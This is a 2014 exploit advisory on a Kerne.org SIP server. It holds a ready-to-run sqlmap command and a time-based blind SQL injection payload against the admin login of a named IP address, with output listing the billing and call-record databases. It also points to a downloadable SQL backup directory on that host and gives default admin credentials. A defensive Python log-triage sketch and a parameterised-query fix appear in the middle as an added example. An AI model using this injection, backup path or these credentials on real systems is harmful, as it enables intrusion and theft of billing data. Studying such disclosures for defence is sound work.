
SIP Server by Kerne.org - Multiple Vulnerabilities

Author: AtT4CKxT3rR0r1ST, Published: 17-05-2014

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : Kerne.org
####################################################################

[1] Time-Based Blind SQL Injection [POST]
=========================================
sqlmap.py -u "http://177.129.8.146/admin/index.php" --data="action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" -p "username" --level=5 --risk=5 --dbs


sqlmap identified the following injection points with a total of 1751 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
available databases [5]:
[*] billing
[*] cdr
[*] information_schema
[*] proftpd
[*] test
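
For log review, the sketch below flags form-encoded POST bodies whose fields carry the kind of value shown in the sqlmap output above (a quote break followed by a MySQL delay function) and notes whether the response was also slow. It is an added example, not part of the original advisory or of the Kerne.org code; the function names, the record layout and the response times are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode

# MySQL functions used to produce a measurable delay (time-based blind probing).
DELAY_FUNCS = re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(", re.IGNORECASE)
# A quote followed by a boolean operator: the value tries to leave its string literal.
QUOTE_BREAK = re.compile(r"""["']\s*(?:AND|OR)\b""", re.IGNORECASE)

def suspicious_params(body):
    """Names of form fields whose decoded value matches both patterns."""
    return [name for name, value in parse_qsl(body, keep_blank_values=True)
            if DELAY_FUNCS.search(value) and QUOTE_BREAK.search(value)]

def triage(records, slow_seconds=2.0):
    """Return (index, fields, delayed) for each flagged request.

    delayed=True means the response was also slow, i.e. the delay expression
    probably ran in the database and the field should be treated as injectable.
    """
    findings = []
    for i, rec in enumerate(records):
        fields = suspicious_params(rec["body"])
        if fields:
            findings.append((i, fields, rec["seconds"] >= slow_seconds))
    return findings

# Constructed sample data: request bodies paired with server response times.
# The probe reuses the username value from the sqlmap output above; the
# response times are invented for the illustration.
LOGIN = {"action": "login", "bntOK": "Enviar", "lang": "pt_BR", "password": "12"}
PROBE = '12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM'
SAMPLE = [
    {"body": urlencode(dict(LOGIN, username="alice")), "seconds": 0.08},
    {"body": urlencode(dict(LOGIN, username=PROBE)), "seconds": 6.40},
    # Contains "sleep(" but never breaks out of a string: not flagged.
    {"body": urlencode(dict(LOGIN, username="bob", password="sleep(well)")), "seconds": 0.09},
    {"body": urlencode(dict(LOGIN, username=PROBE)), "seconds": 0.11},
]

if __name__ == "__main__":
    for index, fields, delayed in triage(SAMPLE):
        state = "delay observed" if delayed else "no delay"
        print(f"request {index}: fields={fields} ({state})")
```

Pattern matching of this kind supports log review only; the fix for the flaw itself is to bind the username value through a parameterised query in the login lookup.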


[2] Backup download
====================
Go to [http://177.129.8.146/admin/sql/]

SQL files are found there and can be downloaded.

[3] Default Admin Login Credentials:
====================================

Username: Operations
Password: k3cn18
